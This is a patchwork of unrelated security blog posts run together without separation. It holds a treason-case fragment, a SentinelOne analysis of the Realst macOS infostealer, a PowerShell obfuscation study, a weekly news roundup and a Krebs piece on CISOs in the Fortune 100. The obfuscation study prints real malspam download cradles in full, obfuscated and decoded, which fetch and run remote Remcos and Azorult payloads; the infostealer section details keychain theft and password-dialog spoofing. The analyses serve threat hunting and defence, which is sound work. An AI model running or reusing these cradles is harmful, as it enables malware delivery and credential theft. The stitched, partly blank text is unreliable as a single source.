In 2019, a Moscow court meted out a 22-year prison sentence for alleged treason charges against Sergei Mikhailov, formerly deputy chief of Russia’s top anti-cybercrime unit. The court also levied a 14-year sentence against Ruslan Stoyanov, a senior employee at Kaspersky Lab. Both men maintained their innocence throughout the trial, and the supposed reason for the treason charges has never been disclosed.

Following their dramatic arrests in 2016, some media outlets reported that the men were suspected of having tipped off American intelligence officials about those responsible for Russian hacking activities tied to the 2016 U.S. presidential election.

That’s because two others arrested for treason at the same time — Mikhailov subordinates Georgi Fomchenkov and Dmitry Dokuchaev — were reported by Russian media to have helped the FBI investigate Russian servers linked to the 2016 hacking of the Democratic National Committee.

Apple Crimeware | Massive Rust Infostealer Campaign Aiming for macOS Sonoma Ahead of Public Release

Earlier this month, security researcher iamdeadlyz reported on multiple fake blockchain games being used to infect both Windows and macOS targets with infostealers, capable of emptying crypto wallets and stealing stored password and browser data.

In the case of macOS, the infostealer turned out to be a new malware written in Rust, dubbed “realst”. Building on this previous analysis, we identified and analyzed 59 malicious Mach-O samples of realst malware. Among those, we discovered some samples are already targeting Apple’s forthcoming OS release, macOS 14 Sonoma.

In this post, we describe the malware in detail to help threat hunters and security teams identify and detect compromises by Realst Infostealer.

Realst Distribution

Realst Infostealer is distributed via malicious websites advertising fake blockchain games with names such as Brawl Earth, WildWorld, Dawnland, Destruction, Evolion, Pearl, Olymp of Reptiles, and SaintLegend. The campaign appears to have links to the earlier PearlLand infostealer. Each version of the fake blockchain game is hosted on its own website complete with associated Twitter and Discord accounts.

fake blockchain game macOS malware infostealer

As reported by iamdeadlyz, threat actors have been observed approaching potential victims through direct messages on social media.

twitter users targeted by fake blockchain game

Individuals who fell for the lures soon found that they had become victims of theft.

Realst Malicious Installers

Some versions of the malware are distributed by a .pkg installer containing a malicious Mach-O and three related scripts.

Contents of the malicious Evolion.pkg
Contents of the malicious Evolion.pkg

The Python script is a cross-platform Firefox infostealer. No actual game is contained here or elsewhere.

Excerpt from the malicious script
Excerpt from the malicious script

The script is in fact a copy of chainbreaker, an open-source project for extracting passwords, keys and certificates from a macOS keychain database. Given the user’s password scraped earlier in the execution chain, chainbreaker will retrieve clear text versions of the user’s internet account and other stored passwords.

Excerpt from the malicious script
Excerpt from the malicious script

Surprisingly, the script is simply a barebones uninstall script with no malicious behavior.

Other versions of realst stealer are distributed as applications via .dmg disk images. In some cases the developer has packaged the malware in Electron apps; in others, native macOS application bundles are used. The previous research provides an in-depth description of these.

Some samples were codesigned with Apple Developer ID (Team Identifier: C46287MB25), which has since been revoked.

Sample 087b3bf372928279d547fb6bb0ab656717fa8c4b
Realst Sample 087b3bf372928279d547fb6bb0ab656717fa8c4b

Other samples are ad-hoc codesigned and will continue to launch, as such signatures cannot be revoked remotely.

Realst Sample 4e5a59a515981fb97bdb272e3e4acb7118e4e6b2
Realst Sample 4e5a59a515981fb97bdb272e3e4acb7118e4e6b2

Dynamic Analysis of Realst Variants

Behaviorally, realst samples look fairly similar across variants and are readily detectable in much the same way as other macOS infostealers. Although they at times use different API calls and have some variant dependencies, from a telemetry point of view the key to all these infostealers is the access and exfiltration of browser data, crypto wallets, and keychain databases.

Targeted browsers include Firefox, Chrome, Opera, Brave and Vivaldi. Safari was not targeted in any of the samples we analyzed. We also note that the malware targets the Telegram application.

realst also targets Telegram app

The samples we analyzed reach out to one of two hardcoded URLs to exfiltrate stolen data:


Most variants (see below for further details) attempt to grab the user’s password via osascript and AppleScript spoofing and perform rudimentary checking that the host device is not a virtual machine via sysctl -n hw.model. We explore these differences in detail in the static analysis section below.

Collected data is dropped in a folder simply named “data”. This may appear in one of several locations depending on the version of the malware: in the user’s home folder, in the working directory of the malware , or in a folder named after the parent game, e.g.,


If the malware was able to access screen capture permission, a screenshot of the Desktop is also taken and deposited in the same location.


Static Analyses of Realst Variants

Our analysis identified 16 variants across 59 samples, which we divide into four major families: A, B, C and D. The division is somewhat arbitrary: There are a number of overlaps that would allow us to draw the lines differently (for example, the use or lack of pycryptodome, or the targeting of macOS Sonoma). We chose the following taxonomy based on string artifacts that should aid threat hunters in better identification and detection.

Realst Variant Family A

Of the 59 Mach-O samples we analyzed, 26 fall into Variant A. This variant has a number of sub variants (we noted ten), but they all share one defining characteristic which isn’t found in Variants B, C and D: The inclusion of whole strings related to AppleScript spoofing.

Example SHA1: 144665cb2e5d65c88579aa4391cebbc116842536
0x752f16:: osascript
0x752f21: display dialog
0x752fb7: with hidden answer
0x7511dc: keychain-db
0x751238: dump-generic-passwords
0x1c75e13: FireFoxDecryptor
0x19444a1: hw.model

Family A variants use AppleScript spoofing in much the same way that we have seen earlier macOS stealers use to grab the user’s admin password in clear text. This technique involves popping a password request dialog box with the “hidden answer” option. This prevents the user seeing the characters they type by replacing them with bullet points, similar to a real password dialog. The important difference being, however, that in this case the password is only obscured from the user themselves. The password is captured and logged in clear text by the AppleScript dialog box.

Variant A contains easily identifiable strings related to password scraping
Variant A contains easily identifiable strings related to password scraping

Like other variants, A samples also include full strings related to anti-analysis through VM detection in the form of hw.model. This is used as an argument to the sysctl command to determine the model of the host device. When run on a Virtual Machine, a macOS instance will typically return the name of the VM software as opposed to the model of Mac.

Realst Variant Family B

Family B variants also have static artifacts related to password spoofing, but these samples are distinctive as they break up the strings into smaller units as a means to evade simple static detection. We found 10/59 samples fell into this category.

Variant B breaks up the strings related to password spoofing
Variant B breaks up the strings related to password spoofing

Otherwise, B variants have similar artifacts to Variant A samples.

Example SHA1: 2d89ffbadddd62483bc2be33e296ce4e6036c45b
0x6940a0: display dialog
0x6b08f3: keychain-db
0x6b094f: dump-generic-passwords
0x6b52cb: hw.model
0x9b8b69: FireFoxDecryptor

Realst Variant Family C

Family C also attempts to hide the strings for AppleScript spoofing by breaking up the strings in the same way as Variant B. However, Variant C is distinctive in that it introduces a reference to chainbreaker within the Mach-O binary itself. 7/59 samples fell into this category.

Variant C includes reference to chainbreak within the Mach-O binary
Variant C includes reference to chainbreaker within the Mach-O binary
SHA1: 112b5637c8cbb7d2e216d89f969515809e1dc66d
0x3fbc10: keychain-db
0x3fbc3c: chainbreaker
0x3fbc51: dump-generic-passwords
0x628e4f: FireFoxDecryptor
0x402552: hw.model

Realst Variant Family D

In Family D, which accounted for 16/59 samples, there are no static artifacts for osascript spoofing. Password scraping is handled by a prompt in the Terminal window via the get_keys_with_access function. Once the password is acquired it is immediately passed to sym.realst::utils::get_kc_keys, which then attempts to dump passwords from the Keychain.

The get_keys_with_access function in Variant D
The get_keys_with_access function in Variant D

In some versions, the malware also uses the scraped password to elevate privileges with the sudo command and install the Python pycryptodome package.

Many samples attempt to install pycryptodome
Many samples attempt to install pycryptodome

The use of pycryptodome is itself inconsistent across samples and families, appearing in around half of the entire collection.

SHA1: d436de35164a045e3c0f7b51cf41fcefedf7e77d
0x3fbc10: keychain-db
0x3fbc47: dump-generic-passwords
0x402542: hw.model
0x628de2: FireFoxDecryptor

Realst Infostealer Prepares for macOS 14 Sonoma

About a third of the samples we identified contain strings targeting macOS 14 Sonoma. These string artifacts appear in around half of Variant A samples, and all of Variant B samples. None of Variants C or D were found to contain Sonoma strings.

Realst malware contains string artifacts related to beta Apple software
Realst malware contains string artifacts related to beta Apple software

It is not clear at this point how differences between Sonoma and Ventura would affect execution of the malware – a question it seems the malware authors are themselves seeking to determine.

SentinelOne Protects Against Realst Infostealer

All known variants of Realst macOS infostealer are detected and, where the ‘Prevent’ site policy is enabled, prevented from execution by the SentinelOne agent. Apple’s malware blocking service “XProtect” does not appear to prevent execution of this malware at the time of writing.

Sentienlone detects realst

Organizations not protected by SentinelOne may use the comprehensive indicators provided in this post to aid threat hunting and detection.


The number of Realst samples and their variation shows that the threat actor has invested serious effort in order to target macOS users for data and crypto wallet theft. Multiple fake game sites complete with Discord servers and associated Twitter accounts have been created to present the illusion of genuine products and convince users to try them out. As soon as the victim launches these fake games and provides the “installer” with a password, their data, passwords and crypto wallets are stolen.

Given the current popular interest in blockchain games, which promise users the reward of making money while gaming, users and security teams are urged to treat solicitations to download and run such games with extreme caution.

Indicators of Compromise


Team Identifier 

Bundle Identifier

Observed MITRE TTPs
T1033 System Owner/User Discovery (whoami)
T1059 Command and Scripting Interpreter (osascript)
T1070.004 File Deletion (rmdir)
T1082 System Information Discovery (sw_vers)
T1083 File and Directory Discovery (dirname, basename)
T1553 Bypass or Subvert Trust Controls (xattr)
T1620 Reflective Code Loading (execv, fork)
T1562 Disable or Modify Tools (sleep, waitpid)
T1639.001 Exfiltration Over Unencrypted Non-C2 Protocol (tcp, http)

Mach-O Files SHA1 
Family Variant A1










Family Variant B1


Family Variant C1


Family Variant D1


Deconstructing PowerShell Obfuscation in Malspam Campaigns

In partnership with vx-underground, SentinelOne recently ran its first Malware Research Challenge, in which we asked researchers across the cybersecurity community to submit their research to showcase their talents and bring their insights to a wider audience.

In today’s post, researcher Ankith Bharadwaj (@bherund) delves into the murkly world of Windows PowerShell obfuscation techniques, widely used in malspam campaigns, to help evade detection by signature-based detection software. This highly valuable, content-rich post provides a great resource for threat hunters, incident responders and security analysts alike.

This research article explores various PowerShell obfuscation techniques, commonly found in real world malspam campaigns.

These scripts are usually launched by VBA macros, embedded in Office documents, and act as download cradles to retrieve and execute remote secondary stage payloads. These methods can prove quite effective against static signature-based detections.

We’ll be going over three different malspam campaigns and exploring eight different code and string obfuscation techniques.

Campaign 1 | Remcos RAT Infection from Malicious Excel Macros

The below script was part of a malspam campaign, delivering Remcos remote access trojan (RAT) via financially-themed emails. Sample artifacts can be found here.

Opening the malicious Excel attachment triggers VBA macro execution.

Office macro spawning Powershell
Office macro spawning Powershell

This, in turn, launches the below obfuscated PowerShell download cradle.                                                  

"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" ping;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.csim''+pmet:vne$,''UxKUVsB6crz3IBA=yekhtua&07712%58868200A4928F46=diser&58868200A4928F46=dic?daolnwod/moc.evil.evirdeno//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX(([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '');start-process($env:temp+ 'misc.vbs')

The cradle primarily employs the following two string obfuscation methods (T1027: Obfuscated Files or Information):

Obfuscation Technique 1: Using Random Variable Names & String Concatenation

Here the script strings are split into multiple parts which are then concatenated through the + or -Join operators.

In the script, we see three random alphanumeric variables, $we22, $b4df and $c3, which hold string values. These are then combined to form the fourth variable $TC, using the -Join operator.

($TC=$c3,$b4df,$we22 -Join '')

The value of TC after the Join operation is:

)'sbv.csim'+pmet:vne$,'UxKUVsB6crz3IBA=yekhtua&.evirdeno//:ptth'(eliFdaolnwoD.)tneilCbeW.teN tcejbO-weN(

Obfuscation Technique 2: String Reversing

The campaign also employs obfuscation through string reversing, using the RightToLeft regex option.

The [regex] type accelerator with the Matches() static method is used to make this work. ForEach looping and -join are used to then combine each of the matched values.

[regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join ''

Obfuscation Technique 3: Command Alias

The campaign also makes use of the IEX cmdlet to run the specified string. This is an alias for the Invoke-Expression cmdlet.

Once completely deobfuscated, the PowerShell command would look something like this (Editor’s note: here and throughout, potentially malicious URLs are defanged for the purpose of publication):

"C:WindowsSystem32WindowsPowerShe1llv1.0powershell.exe" ping;IEX((New-Object Net.WebCLient).DownloadFile( 'hXXp://onedrive[.]&authkey=ABI3zrc6BsVUKxU',$env:temp+'misc.vbs'));start-process($env:temp+ 'misc.vbs')

Campaign 2 | Azorult Distributed Through Malspam

The next script was part of a malspam campaign delivering Azorult Infostealer. Sample artifacts can be found here.

Office macro spawning cmd.exe and Powershell
Office macro spawning cmd.exe and Powershell

Obfuscation Technique 4: Encoding (Base64)

The script is first obfuscated in two layers of base64 encoding, before the clear text strings can be seen. (T1140: Deobfuscate/Decode Files or Information).

The first layer of base64 encoding uses the -e option (short for -EncodeCommand).


This accepts a base64-encoded string version of a command.

In the second layer of base64 encoding, we see the use of the function FromBase64String().


The final clear text PowerShell will look something like the example below.

try{for ($i=1; $i -le 13000; $i++) {$i,"`n"}}catch{} function kqmeh ( $yphjc , $qhl ) {iMpoRt-MOdULE biTSTrANsFEr;StART-BiTsTRanSfEr -sourCe $yphjc -DesTinAtIoN $qhl; Invoke-Item $qhl;}try{  $cwwheb=$env:temp+'scwxc.exe';kqmeh 'hXXp://georgeprapas[.]com/cem/VVZMYLHaSOcblqo[.]exe' $cwwheb;}catch{}

Although not an obfuscation technique, it’s interesting to note the for loop at the start of the script.

for ($i=1; $i -le 13000; $i++) {$i,"`n"}

This just prints numbers from 1–13000. This is most likely implemented to delay secondary stage payload download, in an attempt to exceed time thresholds of automated analysis environments (T1497.003: Virtualization/Sandbox Evasion: Time Based Evasion).

Obfuscation Technique 5: Functions & Try-Catch Block

A try-catch block is implemented to invoke the function (kqmeh) and pass the mentioned parameters. The values passed are for the Source (location of the secondary payload) and Destination (where the payload will be saved locally) parameters for the Start-BitTransfer cmdlet. This creates a Background Intelligent Transfer Service (BITS) transfer job to transfer the malicious executable.

The final deobfuscated PowerShell command would look something like this:

Import-Module BitsTransfer;Start-BitsTransfer -Source 'hXXp[://]georgeprapas[.]com/cem/VVZMYLHaSOcblqo[.]exe' -Destination$env:temp+'scwxc.exe';Invoke-Item($env:temp+'scwxc.exe')

Campaign 3 | Remcos RAT Infection from Malicious Excel Macros

The next script was part of another malspam campaign also delivering Remcos RAT. Sample artifacts can be found here.

Office macro spawning Powershell
Office macro spawning Powershell

Obfuscation Technique 6: Argument Replacement

powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('hXXps[://]tinyurl[.]com/y4cpohnr'','nm.exe')

Here we see the usage of the argument -w 1, instead of -w hidden. Here, 1 is the numerical representation of hidden, and is commonly used to conceal any PowerShell windows from the plain sight of users (T1564.003: Hide Artifacts: Hidden Window).

Obfuscation Technique 7: Escape Character

This technique attempts to obfuscate a PowerShell cmdlet (nEw-oB`jecT ) using the backtick (`) character. Backtick is the escape character in PowerShell.

In PowerShell, there are 14 escape sequences, and all begin with the backtick character. For example, new line is represented as `n. However, in our case `j is not a recognized escape character, and so nEw-oB`jecT will be interpreted as nEw-oBjecT.

Obfuscation Technique 8: Mixed Case Letters

This is pretty straight forward. Since PowerShell cmdlets are not case sensitive, the attacker attempts to mix upper and lower case letters to hopefully evade static signature matchings that are case sensitive.

The final deobfuscated PowerShell command that is run will look something like this:

powershell -w hidden (New-Object Net.Webclient).DownloadFile.Invoke('hXXps[://]tinyurl[.]com/y4cpohnr'', 'nm.exe')

MITRE ATT&CK TTPs Encountered

Initial Access
T1566.001: Phishing: Spearphishing Attachment
T1059.001: Command and Scripting Interpreter: PowerShell
T1059.005: Command and Scripting Interpreter: Visual Basic
T1204.002: User Execution: Malicious File
Defense Evasion
T1564.003: Hide Artifacts: Hidden Window
T1497.003: Virtualization/Sandbox Evasion: Time Based Evasion
T1197: BITS Jobs
T1140: Deobfuscate/Decode Files or Information

The Good, the Bad and the Ugly in Cybersecurity – Week 29

The Good | The White House Unveils Cybersecure Labeling Program for IoT Devices

A U.S.-wide cybersecurity certification and labeling program launched this week to guide consumers in choosing tech products that are less vulnerable to attack. The latest from the Biden-Harris administration, the “U.S. Cyber Trust Mark” is expected to enhance cybersecurity measures across popular smart devices used in homes, schools, offices, and more. The program is a collaborative one involving voluntary industry participation, oversight from the FCC, and stringent cyber standards set by NIST.

The U.S. Cyber Trust Mark enables consumers to identify which internet and Bluetooth-connected devices are cybersecure, including common items like fitness trackers, baby monitors, home security systems, and smart appliances. Suppliers that meet the program’s security requirements will bear a “Cyber Trust” label as early as next year. So far, participants include Amazon, Best Buy, Google, LG Electronics USA, Logitech, and Samsung.

Use of Internet of Things (IoT) devices has soared within the past decade. In 2023, there are an estimated 15 billion internet-connected devices in use globally, with that number expected to explode up to 29 billion by 2030. This widespread adoption makes IoT devices a lucrative target for cyberattackers. Seen as vulnerable entry points into private networks, IoT devices entice attackers to exploit, disrupt, or compromise systems and privacy.

FCC officials say that the mark will give consumers peace of mind and help them make more informed purchases. Additionally, program-approved devices will include QR codes allowing users to easily access any updates in applicable security information. The new program from the White House follows similar cybersafety labeling initiatives such as Singapore’s SG Cyber Safe Programme and the Cyber Essentials certification and trademark program from the U.K.’s National Cyber Security Center.

The Bad | Design Flaw In Google Cloud Increases Chances of Supply Chain Attacks

Security researchers this week discovered a critical design flaw in the Google Cloud Build service that could allow attackers to escalate privileges and tamper with production environments. Dubbed ‘Bad.Build’, the flaw gives attackers nearly full, unauthorized access to Google’s Artifact Registry code repositories.

With this kind of access, attackers would be able to impersonate the account’s continuous integration and delivery (CI/CD) service and run API calls. After taking control over the application images, attackers could then inject malicious code, poisoning customer’s environments with malicious applications and opening them up for potential supply chain attacks.

In their report, researchers warned that the impact of this flaw could be diverse as it applies to any organization using the registry as their main or secondary image repository. Disruption of this could, in turn, spread malware to a wider pool of users or lead to DoS attacks and data theft.

The Google Security Team has since revoked the logging.privateLogEntries.list permission from the default Cloud Build Service Account. However, the researchers claim that is a partial fix that does not address the flaw in the Artifact Registry and continues to leave users at risk of privilege escalation abuse and possible supply chain attacks. They recommend that users apply the principle of least privilege (PoLP) and implement cloud-centric security measures capable of detecting and responding to any identified anomalies in the behavior of the default Google Cloud Build service account.

The Ugly | Security Researchers Link JumpCloud Attack to North Korean State-Backed Threat Actor

Following a state-backed breach of Colorado-based software firm, JumpCloud, SentinelLabs researchers published findings linking the attack to a North Korean APT. The incident was first discovered earlier this month, after the company’s systems were targeted in a spear phishing attack. After discovery, JumpCloud forced a rotation of all admin API keys and notified customers to generate new keys. The company has since rebuilt the compromised infrastructure and shared IoCs with the community.

Review of the IoCs led SentinelLabs to associate the cluster of threat activity to a DPRK-sponsored APT who have been observed leveraging a supply chain targeting approach in previous campaigns. SentinelLabs mapped out the threat actor’s infrastructure to show the links between details of the intrusion to the underlying patterns, comprising domains and IP addresses, noted in similar campaigns. After correlating specific domains recently shared by GitHub to forensic analysis from JumpCloud’s ongoing investigation, SentinelLabs found clear links to NPM and ‘package’ themed infrastructure characteristic of other DPRK-linked campaigns they track.

Infrastructure Map Noting JumpCloud and GitHub Overlap
Infrastructure Map Noting JumpCloud and GitHub Overlap

While JumpCloud emphasized that the intrusion was highly targeted and limited to specific customers only, it is evident that North Korean threat actors are continuously exploring new methods of infiltration, many of which seem to lean towards targeting supply chains. Numbers gathered in 2022 point to supply chain attacks as the leading cause of data breaches; 40% more than malware which had been, until recently, viewed as the core of most attacks. As more actors conduct supply chain attacks to pivot into high-value networks, researchers urge organizations to share threat intelligence, invest in advanced endpoint protection, and establish strong authentication and access controls.

Few Fortune 100 Firms List Security Pros in Their Executive Ranks

Many things have changed since 2018, such as the names of the companies in the Fortune 100 list. But one aspect of that vaunted list that hasn’t shifted much since is that very few of these companies list any security professionals within their top executive ranks.

The next time you receive a breach notification letter that invariably says a company you trusted places a top priority on customer security and privacy, consider this: Only four of the Fortune 100 companies currently list a security professional in the executive leadership pages of their websites. This is actually down from five of the Fortune 100 in 2018, the last time KrebsOnSecurity performed this analysis.

A review of the executives pages published by the 2022 list of Fortune 100 companies found only four — BestBuy, Cigna, Coca-Cola,  and Walmart — that listed a Chief Security Officer (CSO) or Chief Information Security Officer (CISO) in their highest corporate ranks.

One-third of last year’s Fortune 100 companies included a Chief Technology Officer (CTO) in their executive stables; 40 listed Chief Information Officer (CIO) roles, but just 21 included a Chief Risk Officer (CRO).

As I noted in 2018, this is not to say that 96 percent of the Fortune 100 companies don’t have a CISO or CSO in their employ: A review of LinkedIn suggests that most of them in fact do have people in those roles, and experts say some of the largest multinational companies will have multiple people in these positions.

But it is interesting to note which executive positions the top companies deem worth publishing in their executive leadership pages. For example, 88 percent listed a Director of Human Resources (or “Chief People Officer”), and 37 out of 100 included a Chief Marketing Officer.

Not that these roles are somehow more or less important than that of a CISO/CSO within the organization. Nor is the average pay hugely different among all these roles. Yet, considering how much marketing (think consumer/customer data) and human resources (think employee personal/financial data) are impacted by your average data breach, it’s somewhat remarkable that more companies don’t list their chief security personnel among their top ranks.

One likely explanation as to why a great many companies still don’t include their security leaders within their highest echelons is that these employees do not report directly to the company’s CEO, board of directors, or Chief Risk Officer.

The CSO or CISO position traditionally has reported to an executive in a technical role, such as the CTO or CIO. But workforce experts say placing the CISO/CSO on unequal footing with the organization’s top leaders makes it more likely that cybersecurity and risk concerns will take a backseat to initiatives designed to increase productivity and generally grow the business.

“Separation of duties is a fundamental concept of security, whether we’re talking about cyber threats, employee fraud, or physical theft,” said Tari Schreider, an analyst with Datos Insights. “But that critical separation is violated every day with the CISO or CSO reporting to the heads of technology.”

IANS, an organization geared toward CISOs/CSOs and their teams, surveyed more than 500 organizations last year and found roughly 65 percent of CISOs still report to a technical leader, such as the CTO or CIO: IANS found 46 percent of CISOs reported to a CIO, with 15 percent reporting directly to a CTO.

A survey last year by IANS found 65 percent of CISOs report to a tech function within organizations, such as the CTO or CIO. Image: IANS Research.

Schreider said one big reason many CISOs and CSOs aren’t listed in corporate executive biographies at major companies is that these positions often do not enjoy the same legal and insurance protections afforded to other officers within the company.

Typically, larger companies will purchase a “Directors and Officers” liability policy that covers legal expenses should one of the organization’s top executives find themselves dragged into court over some business failing on the part of their employer. But organizations that do not offer this coverage to their security leaders are unlikely to list those positions in their highest ranks, Schreider said.

“It’s frankly shocking,” Schreider said, upon hearing that only four of the Fortune 100 listed any security personnel in their top executive hierarchies. “If the company isn’t going to give them legal cover, then why give them the responsibility for security? Especially when CISOs and CSOs shouldn’t own the risk, yet the majority of them carry the mantle of responsibility and they tend to be scapegoats” when the organization eventually gets hacked, he said.

Schreider said while Datos Insights focuses mostly on the financial and insurance industries, a recent Datos survey echoes the IANS findings from last year. Datos surveyed 25 of the largest financial institutions by asset size (two of which are no longer in existence), and found just 22 percent of CSOs/CISOs reported to the CEO. A majority — 65 percent — had their CSOs/CISOs reporting to either a CTO or CIO.

“I’ve looked at these types of statistics for years and they’ve never really changed that much,” Schreider said. “The CISO or CSO is in the purview of the technical stack from a management perspective. Right, wrong or indifferent, that’s what’s happening.”

Earlier this year, IT consulting firm Accenture released results from surveying more than 3,000 respondents from 15 industries across 14 countries about their security maturity levels. Accenture found that only about one-third of the organizations they surveyed had enough security maturity under their belts to have integrated security into virtually every aspect of their businesses — and this includes having CISOs or CSOs report to someone in charge of overseeing risk for the business as a whole.

Not surprisingly, Accenture also found that only a third of respondents considered cybersecurity risk “to a great extent” when evaluating overall enterprise risk.

“This highlights there is still some way to go to make cybersecurity a proactive, strategic necessity within the business,” the report concluded.

One way of depicting the different stages of security maturity.

A spreadsheet tracking the prevalence of security leaders on the executive pages of the 2022 Fortune 100 firms is available here.